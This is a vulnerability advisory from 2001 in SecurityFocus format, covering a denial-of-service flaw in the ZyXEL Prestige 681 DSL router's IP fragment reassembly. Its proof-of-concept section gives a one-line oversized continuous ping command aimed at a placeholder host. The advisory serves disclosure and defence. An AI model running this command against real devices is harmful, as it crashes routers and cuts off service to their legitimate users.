Zyxel Prestige SDSL Router IP Fragment Reassembly Vulnerability
BID:3711
Info
Zyxel Prestige SDSL Router IP Fragment Reassembly Vulnerability
| Bugtraq ID: | 3711 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 18 2001 12:00AM |
| Updated: | Dec 18 2001 12:00AM |
| Credit: | This vulnerability was announced by Przemyslaw Frasunek <[email protected]> via Bugtraq on December 18, 2001. |
| Vulnerable: |
ZyXEL Prestige 681 |
| Not Vulnerable: | |
Discussion
Zyxel Prestige SDSL Router IP Fragment Reassembly Vulnerability
Prestige is a product line of DSL routers produced and distributed by Zyxel.
When a Zyxel router receives fragmented packets that after reassembly is greater than 64 kilobytes in length, the router crashes. The router must be power cycled to resume normal operation. This could lead to a remote user denying service to a legitimate user of the router. The router is affected only by fragmented packets received through the DSL interface. Fragmented packets sent through the LAN interface have no affect on the system.
Prestige is a product line of DSL routers produced and distributed by Zyxel.
When a Zyxel router receives fragmented packets that after reassembly is greater than 64 kilobytes in length, the router crashes. The router must be power cycled to resume normal operation. This could lead to a remote user denying service to a legitimate user of the router. The router is affected only by fragmented packets received through the DSL interface. Fragmented packets sent through the LAN interface have no affect on the system.
Exploit / POC
Zyxel Prestige SDSL Router IP Fragment Reassembly Vulnerability
ping -t -l 65500 victim.example.com
ping -t -l 65500 victim.example.com
Solution / Fix
Zyxel Prestige SDSL Router IP Fragment Reassembly Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Zyxel Prestige SDSL Router IP Fragment Reassembly Vulnerability
References:
References: